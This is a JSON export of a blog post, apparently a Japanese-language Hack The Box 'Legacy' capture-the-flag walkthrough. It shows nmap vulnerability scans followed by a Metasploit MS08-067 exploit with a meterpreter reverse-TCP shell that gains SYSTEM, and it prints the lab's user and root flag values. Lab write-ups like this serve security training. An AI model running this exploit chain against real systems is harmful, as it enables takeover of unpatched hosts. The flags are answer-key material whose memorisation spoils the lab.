{"id":3707,"date":"2020-08-04T21:55:47","date_gmt":"2020-08-04T12:55:47","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3707"},"modified":"2020-08-30T23:36:52","modified_gmt":"2020-08-30T14:36:52","slug":"hack-the-box-legacy-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3707","title":{"rendered":"Hack The Box – Legacy – Walkthrough"},"content":{"rendered":"

Samba\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u78ba\u8a8d<\/h3>\n
\r\n# nmap -A -n -F -T5 legacy.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-02 14:41 UTC\r\nNmap scan report for legacy.htb (10.10.10.4)\r\nHost is up (0.047s latency).\r\nNot shown: 97 filtered ports\r\nPORT     STATE  SERVICE       VERSION\r\n139\/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn\r\n445\/tcp  open   microsoft-ds  Windows XP microsoft-ds\r\n3389\/tcp closed ms-wbt-server\r\n<\/pre>\n
Samba\u306e\u8106\u5f31\u6027\u3092\u8abf\u67fb<\/h3>\n
ms08-067,ms17-010 \u306b\u8a72\u5f53\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u3063\u305f\u3002<\/p>\n
\r\n# nmap --script=vuln -p 445 legacy.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-02 15:53 UTC\r\nNmap scan report for legacy.htb (10.10.10.4)\r\nHost is up (0.052s latency).\r\n\r\nPORT    STATE SERVICE\r\n445\/tcp open  microsoft-ds\r\n|_clamav-exec: ERROR: Script execution failed (use -d to debug)\r\n\r\nHost script results:\r\n|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED\r\n| smb-vuln-ms08-067:\r\n|   VULNERABLE:\r\n|   Microsoft Windows system vulnerable to remote code execution (MS08-067)\r\n|     State: LIKELY VULNERABLE\r\n|     IDs:  CVE:CVE-2008-4250\r\n|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,\r\n|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary\r\n|           code via a crafted RPC request that triggers the overflow during path canonicalization.\r\n|\r\n|     Disclosure date: 2008-10-23\r\n|     References:\r\n|       https:\/\/technet.microsoft.com\/en-us\/library\/security\/ms08-067.aspx\r\n|_      https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2008-4250\r\n|_smb-vuln-ms10-054: false\r\n|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)\r\n| smb-vuln-ms17-010:\r\n|   VULNERABLE:\r\n|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\r\n|     State: VULNERABLE\r\n|     IDs:  CVE:CVE-2017-0143\r\n|     Risk factor: HIGH\r\n|       A critical remote code execution vulnerability exists in Microsoft SMBv1\r\n|        servers (ms17-010).\r\n|\r\n|     Disclosure date: 2017-03-14\r\n|     References:\r\n|       https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-0143\r\n|       https:\/\/technet.microsoft.com\/en-us\/library\/security\/ms17-010.aspx\r\n|_      https:\/\/blogs.technet.microsoft.com\/msrc\/2017\/05\/12\/customer-guidance-for-wannacrypt-attacks\/\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 36.60 seconds\r\n<\/pre>\n
ms08-067 \u3092\u8d77\u70b9\u306b\u3059\u308b<\/h3>\n
\r\n# msfconsole\r\n\r\nmsf5 > search ms08-067\r\n\r\nMatching Modules\r\n================\r\n\r\n   #  Name                                 Disclosure Date  Rank   Check  Description\r\n   -  ----                                 ---------------  ----   -----  -----------\r\n   0  exploit\/windows\/smb\/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption\r\n\r\nmsf5 > use 0\r\n[*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\r\nmsf5 exploit(windows\/smb\/ms08_067_netapi) > show options\r\n\r\nModule options (exploit\/windows\/smb\/ms08_067_netapi):\r\n\r\n   Name     Current Setting  Required  Description\r\n   ----     ---------------  --------  -----------\r\n   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'\r\n   RPORT    445              yes       The SMB service port (TCP)\r\n   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)\r\n\r\n\r\nPayload options (windows\/meterpreter\/reverse_tcp):\r\n\r\n   Name      Current Setting  Required  Description\r\n   ----      ---------------  --------  -----------\r\n   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)\r\n   LHOST     172.17.0.2       yes       The listen address (an interface may be specified)\r\n   LPORT     4444             yes       The listen port\r\n\r\n\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   Automatic Targeting\r\n\r\nmsf5 exploit(windows\/smb\/ms08_067_netapi) > set RHOSTS legacy.htb\r\nRHOSTS => legacy.htb\r\nmsf5 exploit(windows\/smb\/ms08_067_netapi) > set LHOST 10.10.14.8\r\nLHOST => 10.10.14.5\r\nmsf5 exploit(windows\/smb\/ms08_067_netapi) > set LPORT 1234\r\nLPORT => 1234\r\n\r\nmsf5 exploit(windows\/smb\/ms08_067_netapi) > exploit\r\n\r\n[-] Handler failed to bind to 10.10.14.5:1234:-  -\r\n[*] Started reverse TCP handler on 0.0.0.0:1234\r\n[*] 10.10.10.4:445 - Automatically detecting the target...\r\n[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English\r\n[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)\r\n[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...\r\n[*] Sending stage (176195 bytes) to 172.17.0.1\r\n[*] Meterpreter session 1 opened (172.17.0.2:1234 -> 172.17.0.1:56878) at 2020-08-04 12:19:15 +0000\r\n\r\nmeterpreter > getuid\r\nServer username: NT AUTHORITY\\SYSTEM\r\n\r\nmeterpreter > shell\r\nProcess 1516 created.\r\nChannel 1 created.\r\nMicrosoft Windows XP [Version 5.1.2600]\r\n(C) Copyright 1985-2001 Microsoft Corp.\r\n\r\nC:\\WINDOWS\\system32>cd C:\\\r\ncd C:\\\r\n\r\nC:\\>type "C:\\Documents and Settings\\john\\Desktop\\user.txt"\r\ntype "C:\\Documents and Settings\\john\\Desktop\\user.txt"\r\ne69af0e4f443de7e36876fda4ec7644f\r\nC:\\>type "C:\\Documents and Settings\\Administrator\\Desktop\\root.txt"\r\ntype "C:\\Documents and Settings\\Administrator\\Desktop\\root.txt"\r\n993442d258b0e0ec917cae9e695d5713\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
Samba\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u78ba\u8a8d # nmap -A -n -F -T5 legacy.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-02 14:41 U […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3707"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3707"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3707\/revisions"}],"predecessor-version":[{"id":3792,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3707\/revisions\/3792"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3707"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3707"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3707"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}